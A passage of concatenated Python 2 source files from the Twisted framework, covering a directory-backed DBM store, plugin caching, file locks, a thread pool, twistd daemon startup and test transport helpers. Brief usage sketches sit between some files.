if obj.type in map(explorer.typeString, [types.FunctionType,
types.MethodType]):
arglist = []
for arg in obj.value['signature']:
if arg.has_key('default'):
a = "%s=%s" % (arg['name'], arg['default'])
elif arg.has_key('list'):
a = "*%s" % (arg['name'],)
elif arg.has_key('keywords'):
a = "**%s" % (arg['name'],)
else:
a = arg['name']
arglist.append(a)
things = ''
if obj.value.has_key('class'):
things = "Class: %s\n" % (obj.value['class'],)
if obj.value.has_key('self'):
things = things + "Self: %s\n" % (obj.value['self'],)
s = "%(name)s(%(arglist)s)\n%(things)s\n%(doc)s\n" % {
'name': obj.value['name'],
'doc': obj.value['doc'],
'things': things,
'arglist': string.join(arglist,", "),
}
else:
s = str(obj) + '\n'
self.toplevel.output.console([('stdout',s)])
if _GNOME_POWER:
BrowserDisplay = spelunk_gnome.SpelunkDisplay
else:
BrowserDisplay = LineOrientedBrowserDisplay
class Signature(pb.RemoteCopy, explorer.Signature):
def __init__(self):
pass
__str__ = explorer.Signature.__str__
pb.setCopierForClass('twisted.manhole.explorer.Signature', Signature)
```
#### File: twisted/persisted/dirdbm.py
```python
import os
import types
import base64
import glob
try:
import cPickle as pickle
except ImportError:
import pickle
try:
_open
except NameError:
_open = open
class DirDBM:
"""A directory with a DBM interface.
This class presents a hash-like interface to a directory of small,
flat files. It can only use strings as keys or values.
"""
def __init__(self, name):
"""
@type name: str
@param name: Base path to use for the directory storage.
"""
self.dname = os.path.abspath(name)
if not os.path.isdir(self.dname):
os.mkdir(self.dname)
else:
# Run recovery, in case we crashed. We delete all files ending
# with ".new". Then we find all files that end with ".rpl". If a
# corresponding file exists without ".rpl", we assume the write
# failed and delete the ".rpl" file. If only a ".rpl" exists, we
# assume the program crashed right after deleting the old entry
# but before renaming the replacement entry.
#
# NOTE: '.' is NOT in the base64 alphabet!
for f in glob.glob(os.path.join(self.dname, "*.new")):
os.remove(f)
replacements = glob.glob(os.path.join(self.dname, "*.rpl"))
for f in replacements:
old = f[:-4]
if os.path.exists(old):
os.remove(f)
else:
os.rename(f, old)
def _encode(self, k):
"""Encode a key so it can be used as a filename.
"""
# NOTE: '_' is NOT in the base64 alphabet!
return base64.encodestring(k).replace('\n', '_').replace("/", "-")
def _decode(self, k):
"""Decode a filename to get the key.
"""
return base64.decodestring(k.replace('_', '\n').replace("-", "/"))
def _readFile(self, path):
"""Read in the contents of a file.
Override in subclasses to e.g. provide transparently encrypted dirdbm.
"""
f = _open(path, "rb")
s = f.read()
f.close()
return s
def _writeFile(self, path, data):
"""Write data to a file.
Override in subclasses to e.g. provide transparently encrypted dirdbm.
"""
f = _open(path, "wb")
f.write(data)
f.flush()
f.close()
def __len__(self):
"""
@return: The number of key/value pairs in this Shelf
"""
return len(os.listdir(self.dname))
def __setitem__(self, k, v):
"""
C{dirdbm[k] = v}
Create or modify a textfile in this directory
@type k: str
@param k: key to set
@type v: str
@param v: value to associate with C{k}
"""
assert type(k) == types.StringType, AssertionError("DirDBM key must be a string")
assert type(v) == types.StringType, AssertionError("DirDBM value must be a string")
k = self._encode(k)
# we create a new file with extension .new, write the data to it, and
# if the write succeeds delete the old file and rename the new one.
old = os.path.join(self.dname, k)
if os.path.exists(old):
new = old + ".rpl" # replacement entry
else:
new = old + ".new" # new entry
try:
self._writeFile(new, v)
except:
os.remove(new)
raise
else:
if os.path.exists(old): os.remove(old)
os.rename(new, old)
def __getitem__(self, k):
"""
C{dirdbm[k]}
Get the contents of a file in this directory as a string.
@type k: str
@param k: key to lookup
@return: The value associated with C{k}
@raise KeyError: Raised when there is no such key
"""
assert type(k) == types.StringType, AssertionError("DirDBM key must be a string")
path = os.path.join(self.dname, self._encode(k))
try:
return self._readFile(path)
except:
raise KeyError, k
def __delitem__(self, k):
"""
C{del dirdbm[foo]}
Delete a file in this directory.
@type k: str
@param k: key to delete
@raise KeyError: Raised when there is no such key
"""
assert type(k) == types.StringType, AssertionError("DirDBM key must be a string")
k = self._encode(k)
try: os.remove(os.path.join(self.dname, k))
except (OSError, IOError): raise KeyError(self._decode(k))
def keys(self):
"""
@return: a C{list} of filenames (keys).
"""
return map(self._decode, os.listdir(self.dname))
def values(self):
"""
@return: a C{list} of file-contents (values).
"""
vals = []
keys = self.keys()
for key in keys:
vals.append(self[key])
return vals
def items(self):
"""
@return: a C{list} of 2-tuples containing key/value pairs.
"""
items = []
keys = self.keys()
for key in keys:
items.append((key, self[key]))
return items
def has_key(self, key):
"""
@type key: str
@param key: The key to test
@return: A true value if this dirdbm has the specified key, a false
value otherwise.
"""
assert type(key) == types.StringType, AssertionError("DirDBM key must be a string")
key = self._encode(key)
return os.path.isfile(os.path.join(self.dname, key))
def setdefault(self, key, value):
"""
@type key: str
@param key: The key to lookup
@param value: The value to associate with key if key is not already
associated with a value.
"""
if not self.has_key(key):
self[key] = value
return value
return self[key]
def get(self, key, default = None):
"""
@type key: str
@param key: The key to lookup
@param default: The value to return if the given key does not exist
@return: The value associated with C{key} or C{default} if not
C{self.has_key(key)}
"""
if self.has_key(key):
return self[key]
else:
return default
def __contains__(self, key):
"""
C{key in dirdbm}
@type key: str
@param key: The key to test
@return: A true value if C{self.has_key(key)}, a false value otherwise.
"""
assert type(key) == types.StringType, AssertionError("DirDBM key must be a string")
key = self._encode(key)
return os.path.isfile(os.path.join(self.dname, key))
def update(self, dict):
"""
Add all the key/value pairs in C{dict} to this dirdbm. Any conflicting
keys will be overwritten with the values from C{dict}.
@type dict: mapping
@param dict: A mapping of key/value pairs to add to this dirdbm.
"""
for key, val in dict.items():
self[key]=val
def copyTo(self, path):
"""
Copy the contents of this dirdbm to the dirdbm at C{path}.
@type path: C{str}
@param path: The path of the dirdbm to copy to. If a dirdbm
exists at the destination path, it is cleared first.
@rtype: C{DirDBM}
@return: The dirdbm this dirdbm was copied to.
"""
path = os.path.abspath(path)
assert path != self.dname
d = self.__class__(path)
d.clear()
for k in self.keys():
d[k] = self[k]
return d
def clear(self):
"""
Delete all key/value pairs in this dirdbm.
"""
for k in self.keys():
del self[k]
def close(self):
"""
Close this dbm: no-op, for dbm-style interface compliance.
"""
def getModificationTime(self, key):
"""
Returns modification time of an entry.
@return: Last modification date (seconds since epoch) of entry C{key}
@raise KeyError: Raised when there is no such key
"""
assert type(key) == types.StringType, AssertionError("DirDBM key must be a string")
path = os.path.join(self.dname, self._encode(key))
if os.path.isfile(path):
return os.path.getmtime(path)
else:
raise KeyError, key
class Shelf(DirDBM):
"""A directory with a DBM shelf interface.
This class presents a hash-like interface to a directory of small,
flat files. Keys must be strings, but values can be any given object.
"""
def __setitem__(self, k, v):
"""
C{shelf[foo] = bar}
Create or modify a textfile in this directory.
@type k: str
@param k: The key to set
@param v: The value to associate with C{key}
"""
v = pickle.dumps(v)
DirDBM.__setitem__(self, k, v)
def __getitem__(self, k):
"""
C{dirdbm[foo]}
Get and unpickle the contents of a file in this directory.
@type k: str
@param k: The key to lookup
@return: The value associated with the given key
@raise KeyError: Raised if the given key does not exist
"""
return pickle.loads(DirDBM.__getitem__(self, k))
def open(file, flag = None, mode = None):
"""
This is for 'anydbm' compatibility.
@param file: The parameter to pass to the DirDBM constructor.
@param flag: ignored
@param mode: ignored
"""
return DirDBM(file)
__all__ = ["open", "DirDBM", "Shelf"]
```
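A short usage sketch of the `DirDBM`/`Shelf` interface defined above; the directory paths are placeholders. It illustrates the dict-like API and the fact that `Shelf` pickles arbitrary values while `DirDBM` only stores strings.

```python
# Sketch: DirDBM stores string values as individual files; Shelf pickles anything.
from twisted.persisted import dirdbm

d = dirdbm.open('/tmp/dirdbm-example')   # really a DirDBM, per open() above
d['greeting'] = 'hello world'            # keys and values must be strings
print d['greeting']                      # -> 'hello world'
print d.keys(), len(d)

s = dirdbm.Shelf('/tmp/shelf-example')
s['config'] = {'retries': 3, 'hosts': ['a', 'b']}   # pickled transparently
print s['config']['retries']                        # -> 3
```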
#### File: site-packages/twisted/plugin.py
```python
from __future__ import generators
import os, errno
from zope.interface import Interface, providedBy
try:
import cPickle as pickle
except ImportError:
import pickle
from twisted.python.components import getAdapterFactory
from twisted.python.reflect import namedAny
from twisted.python.win32 import ERROR_FILE_NOT_FOUND, ERROR_PATH_NOT_FOUND
from twisted.python.win32 import ERROR_INVALID_NAME, WindowsError
from twisted.python import log
try:
from os import stat_float_times
from os.path import getmtime as _getmtime
def getmtime(x):
sft = stat_float_times()
stat_float_times(True)
try:
return _getmtime(x)
finally:
stat_float_times(sft)
except:
from os.path import getmtime
class IPlugin(Interface):
"""Interface that must be implemented by all plugins.
Only objects which implement this interface will be considered for
return by C{getPlugins}. To be useful, plugins should also
implement some other application-specific interface.
"""
class ITestPlugin(Interface):
"""A plugin for use by the plugin system's unit tests.
Do not use this.
"""
class ITestPlugin2(Interface):
"""See L{ITestPlugin}.
"""
class CachedPlugin(object):
def __init__(self, dropin, name, description, provided):
self.dropin = dropin
self.name = name
self.description = description
self.provided = provided
self.dropin.plugins.append(self)
def __repr__(self):
return '<CachedPlugin %r/%r (provides %r)>' % (
self.name, self.dropin.moduleName,
', '.join([i.__name__ for i in self.provided]))
def load(self):
return namedAny(self.dropin.moduleName + '.' + self.name)
def __conform__(self, interface, registry=None, default=None):
for providedInterface in self.provided:
if providedInterface.isOrExtends(interface):
return self.load()
if getAdapterFactory(providedInterface, interface, None) is not None:
return interface(self.load(), default)
return default
# backwards compat HOORJ
getComponent = __conform__
class CachedDropin(object):
def __init__(self, moduleName, description):
self.moduleName = moduleName
self.description = description
self.plugins = []
def _generateCacheEntry(provider):
dropin = CachedDropin(provider.__name__,
provider.__doc__)
for k, v in provider.__dict__.iteritems():
plugin = IPlugin(v, None)
if plugin is not None:
cachedPlugin = CachedPlugin(dropin, k, v.__doc__, list(providedBy(plugin)))
return dropin
try:
fromkeys = dict.fromkeys
except AttributeError:
def fromkeys(keys, value=None):
d = {}
for k in keys:
d[k] = value
return d
_exts = fromkeys(['.py', '.so', '.pyd', '.dll'])
def getCache(module):
topcache = {}
for p in module.__path__:
dropcache = os.path.join(p, "dropin.cache")
try:
cache = pickle.load(file(dropcache))
lastCached = getmtime(dropcache)
dirtyCache = False
except:
cache = {}
lastCached = 0
dirtyCache = True
try:
dropinNames = os.listdir(p)
except WindowsError, e:
# WindowsError is an OSError subclass, so if not for this clause
# the OSError clause below would be handling these. Windows
# error codes aren't the same as POSIX error codes, so we need
# to handle them differently.
# Under Python 2.5 on Windows, WindowsError has a winerror
# attribute and an errno attribute. The winerror attribute is
# bound to the Windows error code while the errno attribute is
# bound to a translation of that code to a perhaps equivalent
# POSIX error number.
# Under Python 2.4 on Windows, WindowsError only has an errno
# attribute. It is bound to the Windows error code.
# For simplicity of code and to keep the number of paths through
# this suite minimal, we grab the Windows error code under
# either version.
# Furthermore, attempting to use os.listdir on a non-existent
# path in Python 2.4 will result in a Windows error code of
# ERROR_PATH_NOT_FOUND. However, in Python 2.5,
# ERROR_FILE_NOT_FOUND results instead. -exarkun
err = getattr(e, 'winerror', e.errno)
if err in (ERROR_PATH_NOT_FOUND, ERROR_FILE_NOT_FOUND):
continue
elif err == ERROR_INVALID_NAME:
log.msg("Invalid path %r in search path for %s" % (p, module.__name__))
continue
else:
raise
except OSError, ose:
if ose.errno not in (errno.ENOENT, errno.ENOTDIR):
raise
else:
continue
else:
pys = {}
for dropinName in dropinNames:
moduleName, moduleExt = os.path.splitext(dropinName)
if moduleName != '__init__' and moduleExt in _exts:
pyFile = os.path.join(p, dropinName)
try:
pys[moduleName] = getmtime(pyFile)
except:
log.err()
for moduleName, lastChanged in pys.iteritems():
if lastChanged >= lastCached or moduleName not in cache:
dirtyCache = True
try:
provider = namedAny(module.__name__ + '.' + moduleName)
except:
log.err()
else:
entry = _generateCacheEntry(provider)
cache[moduleName] = entry
for moduleName in cache.keys():
if moduleName not in pys:
dirtyCache = True
del cache[moduleName]
topcache.update(cache)
if dirtyCache:
newCacheData = pickle.dumps(cache, 2)
tmpCacheFile = dropcache + ".new"
try:
stage = 'opening'
f = file(tmpCacheFile, 'wb')
stage = 'writing'
f.write(newCacheData)
stage = 'closing'
f.close()
stage = 'renaming'
os.rename(tmpCacheFile, dropcache)
except (OSError, IOError), e:
# A large number of errors can occur here. There's nothing we
# can really do about any of them, but they are also non-fatal
# (they only slow us down by preventing results from being
# cached). Notify the user of the error, but proceed as if it
# had not occurred.
log.msg("Error %s plugin cache file %r (%r): %r" % (
stage, tmpCacheFile, dropcache, os.strerror(e.errno)))
return topcache
import twisted.plugins
def getPlugins(interface, package=twisted.plugins):
"""Retrieve all plugins implementing the given interface beneath the given module.
@param interface: An interface class. Only plugins which
implement this interface will be returned.
@param package: A package beneath which plugins are installed. For
most uses, the default value is correct.
@return: An iterator of plugins.
"""
allDropins = getCache(package)
for dropin in allDropins.itervalues():
for plugin in dropin.plugins:
try:
adapted = interface(plugin, None)
except:
log.err()
else:
if adapted is not None:
yield adapted
# Old, backwards compatible name. Don't use this.
getPlugIns = getPlugins
__all__ = ['getPlugins']
```
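A minimal sketch of how the cache/plugin machinery above is typically consumed. `ITestPlugin` is the test-only interface defined in this same module and is used here purely for illustration; in practice the loop may yield nothing if no such plugins are installed.

```python
# Sketch: enumerate plugins implementing a given interface.
from twisted.plugin import getPlugins, ITestPlugin
import twisted.plugins

for plug in getPlugins(ITestPlugin, twisted.plugins):
    # each yielded object is the loaded plugin, already adapted to ITestPlugin
    print plug
```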
#### File: twisted/python/dxprofile.py
```python
import sys, types, xmlrpclib
def rle(iterable):
"""Run length encode a list"""
iterable = iter(iterable)
runlen = 1
result = []
try:
previous = iterable.next()
except StopIteration:
return []
for element in iterable:
if element == previous:
runlen = runlen + 1
continue
else:
if isinstance(previous, (types.ListType, types.TupleType)):
previous = rle(previous)
result.append([previous, runlen])
previous = element
runlen = 1
if isinstance(previous, (types.ListType, types.TupleType)):
previous = rle(previous)
result.append([previous, runlen])
return result
def report(email, appname):
"""
Send an RLE encoded version of sys.getdxp() off to our Top Men (tm)
for analysis.
"""
if hasattr(sys, 'getdxp') and appname:
dxp = xmlrpclib.ServerProxy("http://manatee.mojam.com:7304")
dxp.add_dx_info(appname, email, sys.version_info[:3], rle(sys.getdxp()))
```
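The `rle()` helper above is self-contained; a tiny sketch of what it produces, with the return values shown in comments following directly from the code as written.

```python
# Sketch: run-length encoding as implemented by rle() above.
from twisted.python.dxprofile import rle

print rle([1, 1, 2, 2, 2, 3])   # -> [[1, 2], [2, 3], [3, 1]]
print rle('aab')                # -> [['a', 2], ['b', 1]]
```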
#### File: twisted/python/lockfile.py
```python
__metaclass__ = type
import errno, os
from time import time as _uniquefloat
def unique():
return str(long(_uniquefloat() * 1000))
try:
from os import symlink
from os import readlink
from os import remove as rmlink
from os import rename as mvlink
except:
# XXX Implement an atomic thingamajig for win32
import shutil
def symlink(value, filename):
newlinkname = filename+"."+unique()+'.newlink'
newvalname = os.path.join(newlinkname,"symlink")
os.mkdir(newlinkname)
f = open(newvalname,'wb')
f.write(value)
f.flush()
f.close()
try:
os.rename(newlinkname, filename)
except:
os.remove(newvalname)
os.rmdir(newlinkname)
raise
def readlink(filename):
return open(os.path.join(filename,'symlink'),'rb').read()
def rmlink(filename):
shutil.rmtree(filename)
def mvlink(src, dest):
try:
shutil.rmtree(dest)
except:
pass
os.rename(src,dest)
class FilesystemLock:
"""A mutex.
This relies on the filesystem property that creating
a symlink is an atomic operation and that it will
fail if the symlink already exists. Deleting the
symlink will release the lock.
@ivar name: The name of the file associated with this lock.
@ivar clean: Indicates whether this lock was released cleanly by its
last owner. Only meaningful after C{lock} has been called and returns
True.
"""
clean = None
locked = False
def __init__(self, name):
self.name = name
def lock(self):
"""Acquire this lock.
@rtype: C{bool}
@return: True if the lock is acquired, false otherwise.
@raise: Any exception os.symlink() may raise, other than
EEXIST.
"""
try:
pid = readlink(self.name)
except (OSError, IOError), e:
if e.errno != errno.ENOENT:
raise
self.clean = True
else:
if not hasattr(os, 'kill'):
return False
try:
os.kill(int(pid), 0)
except (OSError, IOError), e:
if e.errno != errno.ESRCH:
raise
rmlink(self.name)
self.clean = False
else:
return False
symlink(str(os.getpid()), self.name)
self.locked = True
return True
def unlock(self):
"""Release this lock.
This deletes the directory with the given name.
@raise: Any exception os.readlink() may raise, or
ValueError if the lock is not owned by this process.
"""
pid = readlink(self.name)
if int(pid) != os.getpid():
raise ValueError("Lock %r not owned by this process" % (self.name,))
rmlink(self.name)
self.locked = False
def isLocked(name):
"""Determine if the lock of the given name is held or not.
@type name: C{str}
@param name: The filesystem path to the lock to test
@rtype: C{bool}
@return: True if the lock is held, False otherwise.
"""
l = FilesystemLock(name)
result = None
try:
result = l.lock()
finally:
if result:
l.unlock()
return not result
__all__ = ['FilesystemLock', 'isLocked']
```
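A small sketch of the `FilesystemLock`/`isLocked` API defined above; the lock path is a placeholder.

```python
# Sketch: acquire, test and release a filesystem lock.
from twisted.python.lockfile import FilesystemLock, isLocked

lock = FilesystemLock('/tmp/myapp.lock')
if lock.lock():
    try:
        print 'acquired (cleanly released last time: %s)' % lock.clean
        # ... do exclusive work ...
    finally:
        lock.unlock()
else:
    print 'someone else holds the lock'

print isLocked('/tmp/myapp.lock')   # False again once the lock is released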
#### File: twisted/python/threadpool.py
```python
import Queue
import threading
import threadable
import copy
import sys
# Twisted Imports
from twisted.python import log, runtime, context
class WorkerStop:
pass
WorkerStop = WorkerStop()
# initialize threading
threadable.init(1)
class ThreadPool:
"""
This class (hopefully) generalizes the functionality of a pool of
threads to which work can be dispatched.
dispatch(), dispatchWithCallback() and stop() should only be called from
a single thread, unless you make a subclass where stop() and
_startSomeWorkers() are synchronized.
"""
__inited = 0
min = 5
max = 20
joined = 0
started = 0
workers = 0
name = None
def __init__(self, minthreads=5, maxthreads=20, name=None):
"""Create a new threadpool.
@param minthreads: minimum number of threads in the pool
@param maxthreads: maximum number of threads in the pool
"""
assert minthreads >= 0, 'minimum is negative'
assert minthreads <= maxthreads, 'minimum is greater than maximum'
self.q = Queue.Queue(0)
self.min = minthreads
self.max = maxthreads
self.name = name
if runtime.platform.getType() != "java":
self.waiters = []
self.threads = []
self.working = []
else:
self.waiters = ThreadSafeList()
self.threads = ThreadSafeList()
self.working = ThreadSafeList()
def start(self):
"""Start the threadpool.
"""
self.joined = 0
self.started = 1
# Start some threads.
self.adjustPoolsize()
def startAWorker(self):
self.workers = self.workers + 1
name = "PoolThread-%s-%s" % (self.name or id(self), self.workers)
try:
firstJob = self.q.get(0)
except Queue.Empty:
firstJob = None
newThread = threading.Thread(target=self._worker, name=name, args=(firstJob,))
self.threads.append(newThread)
newThread.start()
def stopAWorker(self):
self.q.put(WorkerStop)
self.workers = self.workers-1
def __setstate__(self, state):
self.__dict__ = state
ThreadPool.__init__(self, self.min, self.max)
def __getstate__(self):
state = {}
state['min'] = self.min
state['max'] = self.max
return state
def _startSomeWorkers(self):
while (
self.workers < self.max and # Don't create too many
len(self.waiters) < self.q.qsize() # but create enough
):
self.startAWorker()
def dispatch(self, owner, func, *args, **kw):
"""Dispatch a function to be a run in a thread.
"""
self.callInThread(func,*args,**kw)
def callInThread(self, func, *args, **kw):
if self.joined:
return
ctx = context.theContextTracker.currentContext().contexts[-1]
o = (ctx, func, args, kw)
self.q.put(o)
if self.started:
self._startSomeWorkers()
def _runWithCallback(self, callback, errback, func, args, kwargs):
try:
result = apply(func, args, kwargs)
except:
errback(sys.exc_info()[1])
else:
callback(result)
def dispatchWithCallback(self, owner, callback, errback, func, *args, **kw):
"""Dispatch a function, returning the result to a callback function.
The callback function will be called in the thread - make sure it is
thread-safe.
"""
self.callInThread(self._runWithCallback, callback, errback, func, args, kw)
def _worker(self, o):
ct = threading.currentThread()
while 1:
if o is WorkerStop:
break
elif o is not None:
self.working.append(ct)
ctx, function, args, kwargs = o
try:
context.call(ctx, function, *args, **kwargs)
except:
context.call(ctx, log.deferr)
self.working.remove(ct)
del o, ctx, function, args, kwargs
self.waiters.append(ct)
o = self.q.get()
self.waiters.remove(ct)
self.threads.remove(ct)
def stop(self):
"""Shutdown the threads in the threadpool."""
self.joined = 1
threads = copy.copy(self.threads)
for thread in range(self.workers):
self.q.put(WorkerStop)
self.workers = self.workers-1
# and let's just make sure
# FIXME: threads that have died before calling stop() are not joined.
for thread in threads:
thread.join()
def adjustPoolsize(self, minthreads=None, maxthreads=None):
if minthreads is None:
minthreads = self.min
if maxthreads is None:
maxthreads = self.max
assert minthreads >= 0, 'minimum is negative'
assert minthreads <= maxthreads, 'minimum is greater than maximum'
self.min = minthreads
self.max = maxthreads
if not self.started:
return
# Kill off some threads if we have too many.
while self.workers > self.max:
self.stopAWorker()
# Start some threads if we have too few.
while self.workers < self.min:
self.startAWorker()
# Start some threads if there is a need.
self._startSomeWorkers()
def dumpStats(self):
log.msg('queue: %s' % self.q.queue)
log.msg('waiters: %s' % self.waiters)
log.msg('workers: %s' % self.working)
log.msg('total: %s' % self.threads)
class ThreadSafeList:
"""In Jython 2.1 lists aren't thread-safe, so this wraps it."""
def __init__(self):
self.lock = threading.Lock()
self.l = []
def append(self, i):
self.lock.acquire()
try:
self.l.append(i)
finally:
self.lock.release()
def remove(self, i):
self.lock.acquire()
try:
self.l.remove(i)
finally:
self.lock.release()
def __len__(self):
return len(self.l)
```
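A hedged sketch of driving the `ThreadPool` above directly, outside the reactor; the worker function and callbacks are illustrative only.

```python
# Sketch: run a few jobs on the pool and shut it down.
from twisted.python.threadpool import ThreadPool

def work(n):
    return n * n

def ok(result):
    print 'got', result

def failed(err):
    print 'error', err

pool = ThreadPool(minthreads=1, maxthreads=4, name='demo')
pool.start()
for i in range(5):
    pool.dispatchWithCallback(None, ok, failed, work, i)
pool.stop()     # queues WorkerStop for each worker and joins the threads
```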
#### File: twisted/scripts/_twistd_unix.py
```python
from twisted.python import log, syslog
from twisted.python.util import switchUID
from twisted.application import app, service
from twisted.scripts import mktap
from twisted import copyright
import os, errno, sys
class ServerOptions(app.ServerOptions):
synopsis = "Usage: twistd [options]"
optFlags = [['nodaemon','n', "don't daemonize"],
['quiet', 'q', "No-op for backwards compatibility."],
['originalname', None, "Don't try to change the process name"],
['syslog', None, "Log to syslog, not to file"],
['euid', '',
"Set only effective user-id rather than real user-id. "
"(This option has no effect unless the server is running as "
"root, in which case it means not to shed all privileges "
"after binding ports, retaining the option to regain "
"privileges in cases such as spawning processes. "
"Use with caution.)"],
]
optParameters = [
['prefix', None,'twisted',
"use the given prefix when syslogging"],
['pidfile','','twistd.pid',
"Name of the pidfile"],
['chroot', None, None,
'Chroot to a supplied directory before running'],
['uid', 'u', None, "The uid to run as."],
['gid', 'g', None, "The gid to run as."],
]
zsh_altArgDescr = {"prefix":"Use the given prefix when syslogging (default: twisted)",
"pidfile":"Name of the pidfile (default: twistd.pid)",}
#zsh_multiUse = ["foo", "bar"]
#zsh_mutuallyExclusive = [("foo", "bar"), ("bar", "baz")]
zsh_actions = {"pidfile":'_files -g "*.pid"', "chroot":'_dirs'}
zsh_actionDescr = {"chroot":"chroot directory"}
def opt_version(self):
"""Print version information and exit.
"""
print 'twistd (the Twisted daemon) %s' % copyright.version
print copyright.copyright
sys.exit()
def postOptions(self):
app.ServerOptions.postOptions(self)
if self['pidfile']:
self['pidfile'] = os.path.abspath(self['pidfile'])
def checkPID(pidfile):
if not pidfile:
return
if os.path.exists(pidfile):
try:
pid = int(open(pidfile).read())
except ValueError:
sys.exit('Pidfile %s contains non-numeric value' % pidfile)
try:
os.kill(pid, 0)
except OSError, why:
if why[0] == errno.ESRCH:
# The pid doesn't exist.
log.msg('Removing stale pidfile %s' % pidfile, isError=True)
os.remove(pidfile)
else:
sys.exit("Can't check status of PID %s from pidfile %s: %s" %
(pid, pidfile, why[1]))
else:
sys.exit("""\
Another twistd server is running, PID %s\n
This could either be a previously started instance of your application or a
different application entirely. To start a new one, either run it in some other
directory, or use the --pidfile and --logfile parameters to avoid clashes.
""" % pid)
def removePID(pidfile):
if not pidfile:
return
try:
os.unlink(pidfile)
except OSError, e:
if e.errno == errno.EACCES or e.errno == errno.EPERM:
log.msg("Warning: No permission to delete pid file")
else:
log.msg("Failed to unlink PID file:")
log.deferr()
except:
log.msg("Failed to unlink PID file:")
log.deferr()
def startLogging(logfilename, sysLog, prefix, nodaemon):
if logfilename == '-':
if not nodaemon:
print 'daemons cannot log to stdout'
os._exit(1)
logFile = sys.stdout
elif sysLog:
syslog.startLogging(prefix)
elif nodaemon and not logfilename:
logFile = sys.stdout
else:
logFile = app.getLogFile(logfilename or 'twistd.log')
try:
import signal
except ImportError:
pass
else:
def rotateLog(signal, frame):
from twisted.internet import reactor
reactor.callFromThread(logFile.rotate)
signal.signal(signal.SIGUSR1, rotateLog)
if not sysLog:
log.startLogging(logFile)
sys.stdout.flush()
def daemonize():
# See http://www.erlenstar.demon.co.uk/unix/faq_toc.html#TOC16
if os.fork(): # launch child and...
os._exit(0) # kill off parent
os.setsid()
if os.fork(): # launch child and...
os._exit(0) # kill off parent again.
os.umask(077)
null=os.open('/dev/null', os.O_RDWR)
for i in range(3):
try:
os.dup2(null, i)
except OSError, e:
if e.errno != errno.EBADF:
raise
os.close(null)
def shedPrivileges(euid, uid, gid):
if uid is not None or gid is not None:
switchUID(uid, gid, euid)
extra = euid and 'e' or ''
log.msg('set %suid/%sgid %s/%s' % (extra, extra, uid, gid))
def launchWithName(name):
if name and name != sys.argv[0]:
exe = os.path.realpath(sys.executable)
log.msg('Changing process name to ' + name)
os.execv(exe, [name, sys.argv[0], '--originalname']+sys.argv[1:])
def setupEnvironment(config):
if config['chroot'] is not None:
os.chroot(config['chroot'])
if config['rundir'] == '.':
config['rundir'] = '/'
os.chdir(config['rundir'])
if not config['nodaemon']:
daemonize()
if config['pidfile']:
open(config['pidfile'],'wb').write(str(os.getpid()))
def startApplication(config, application):
process = service.IProcess(application, None)
if not config['originalname']:
launchWithName(process.processName)
setupEnvironment(config)
service.IService(application).privilegedStartService()
uid, gid = mktap.getid(config['uid'], config['gid'])
if uid is None:
uid = process.uid
if gid is None:
gid = process.gid
shedPrivileges(config['euid'], uid, gid)
app.startApplication(application, not config['no_save'])
class UnixApplicationRunner(app.ApplicationRunner):
"""
An ApplicationRunner which does Unix-specific things, like fork,
shed privileges, and maintain a PID file.
"""
def preApplication(self):
"""
Do pre-application-creation setup.
"""
checkPID(self.config['pidfile'])
self.config['nodaemon'] = (self.config['nodaemon']
or self.config['debug'])
self.oldstdout = sys.stdout
self.oldstderr = sys.stderr
startLogging(self.config['logfile'], self.config['syslog'],
self.config['prefix'], self.config['nodaemon'])
app.initialLog()
def postApplication(self):
"""
To be called after the application is created: start the
application and run the reactor. After the reactor stops,
clean up PID files and such.
"""
startApplication(self.config, self.application)
app.runReactorWithLogging(self.config, self.oldstdout, self.oldstderr)
removePID(self.config['pidfile'])
app.reportProfile(self.config['report-profile'],
service.IProcess(self.application).processName)
log.msg("Server Shut Down.")
```
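A short sketch of the PID-file helpers defined above, used on their own; the path is a placeholder and the body of the `try` block stands in for the real application run.

```python
# Sketch: the same checkPID/removePID dance twistd performs around a run.
import os
from twisted.scripts._twistd_unix import checkPID, removePID

pidfile = '/tmp/demo-twistd.pid'
checkPID(pidfile)                           # exits if another live process owns it
open(pidfile, 'wb').write(str(os.getpid())) # record ourselves, as setupEnvironment does
try:
    pass                                    # ... run the application ...
finally:
    removePID(pidfile)
```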
#### File: twisted/test/app_qtstub.py
```python
import sys
from twisted.application import reactors
class QTNotImporter:
"""
Import hook which unilaterally rejects any attempt to import
C{qtreactor} so that we can reliably test the behavior of attempting to
install it when it is not present.
"""
def find_module(self, fullname, path):
"""
Reject attempts to import C{qtreactor}. Ignore everything else.
"""
if fullname == 'qtreactor':
raise ImportError('qtreactor does not exist!')
def main():
"""
Try to install the reactor named C{qt}. Expect it to not work. Print
diagnostics to stdout if something goes wrong, print nothing otherwise.
"""
sys.meta_path.insert(0, QTNotImporter())
try:
reactors.installReactor('qt')
except reactors.NoSuchReactor, e:
if e.args != ('qt',):
print 'Wrong arguments to NoSuchReactor:', e.args
else:
# Do nothing to indicate success.
pass
else:
print 'installed qtreactor successfully'
sys.stdout.flush()
if __name__ == '__main__':
main()
```
#### File: twisted/test/proto_helpers.py
```python
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from twisted.protocols import basic
from twisted.internet import error
class LineSendingProtocol(basic.LineReceiver):
lostConn = False
def __init__(self, lines, start = True):
self.lines = lines[:]
self.response = []
self.start = start
def connectionMade(self):
if self.start:
map(self.sendLine, self.lines)
def lineReceived(self, line):
if not self.start:
map(self.sendLine, self.lines)
self.lines = []
self.response.append(line)
def connectionLost(self, reason):
self.lostConn = True
class FakeDatagramTransport:
noAddr = object()
def __init__(self):
self.written = []
def write(self, packet, addr=noAddr):
self.written.append((packet, addr))
class StringTransport:
disconnecting = 0
hostAddr = None
peerAddr = None
def __init__(self, hostAddress=None, peerAddress=None):
self.clear()
if hostAddress is not None:
self.hostAddr = hostAddress
if peerAddress is not None:
self.peerAddr = peerAddress
def clear(self):
self.io = StringIO()
def value(self):
return self.io.getvalue()
def write(self, data):
self.io.write(data)
def writeSequence(self, data):
self.io.write(''.join(data))
def loseConnection(self):
pass
def getPeer(self):
if self.peerAddr is None:
return ('StringIO', repr(self.io))
return self.peerAddr
def getHost(self):
if self.hostAddr is None:
return ('StringIO', repr(self.io))
return self.hostAddr
class StringTransportWithDisconnection(StringTransport):
def loseConnection(self):
self.protocol.connectionLost(error.ConnectionDone("Bye."))
```
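A small sketch showing how the `StringTransport` helper above is normally used in tests, with a trivial protocol as a stand-in.

```python
# Sketch: drive a protocol against StringTransport and inspect what it wrote.
from twisted.internet import protocol
from twisted.test.proto_helpers import StringTransport

class Greeter(protocol.Protocol):
    def connectionMade(self):
        self.transport.write('hello\r\n')

transport = StringTransport()
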